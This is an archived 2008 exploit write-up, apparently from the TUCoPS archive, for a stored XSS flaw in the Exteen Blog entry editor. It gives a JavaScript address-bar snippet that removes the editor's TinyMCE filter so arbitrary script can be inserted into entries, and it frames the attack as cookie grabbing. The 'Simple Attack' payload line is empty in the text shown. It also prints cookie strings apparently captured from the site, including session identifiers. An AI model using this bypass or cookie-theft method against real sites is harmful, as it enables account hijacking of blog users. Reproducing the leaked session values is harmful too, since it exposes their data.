TUCoPS :: Web :: Blogs

TUCoPS :: Web :: Blogs :: bx3280.htm
Exteen Blog XSS Remote Cookie Disclosure Exploit

Exteen Blog XSS Remote Cookie Disclosure Exploit Exteen Blog XSS Remote Cookie Disclosure Exploit


===========================================================0D
     Exteen Blog XSS Remote Cookie Disclosure Exploit             =0D
===========================================================0D
=0D
=0D
AUTHOR : CWH Underground=0D
DATE   : 22 May 2008=0D
SITE : www.citec.us=0D 
=0D
=0D
#####################################################=0D
 APPLICATION : Exteen Blog=0D
VENDOR : www.exteen.com=0D 
#####################################################=0D
=0D
--- Vulnerable page ---=0D
[-] http://www.exteen.com/manage/entryeditor.php (Create New Entry Page)=0D 
=0D
--- Description ---=0D
There are 2 ways to exploit this page=0D
=0D
1. Type "javascript:(function(){var x = document.getElementById('mce_editor_0_parent'); x.previousSibling.style.display = 'block';x.parentNode.removeChild (x);})()" on address bar and press Enter=0D
2. Disable javascript on your Browser and visit vulnerable page=0D
																	.=0D
Two methods above will remove tinymce filter after that you can insert any script or HTML tag in your entry :D=0D
=0D
=0D
--- Exploit (Grabbing Cookies)---=0D
=0D
Simple Attack: =0D 
=0D
=0D
--- Note ---=0D
=0D
This website implement httpOnly that prevent from stealing cookies on ie (>= 6) and firefox (>= 2.0.0.5)=0D
=0D
=Result==0D
IE & Gecko: 	_uid57334=D8428C8A.2; _cbclose57334=1; _ctout57334=1; VisitOn=54016; VisitorTRUE=11=0D
OPERA & Safari: _cbclose57334=1; _uid57334=16944A6F.1; sid=gdcvv9mab89uf9cmg3hqmhq570; keyx=NjgdHFErNXpCD1wpVTsYCF0dfx8KBTIDEFM; _ctout57334=1=0D
=0D
##################################################################=0D
# Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C   #=0D
##################################################################=0D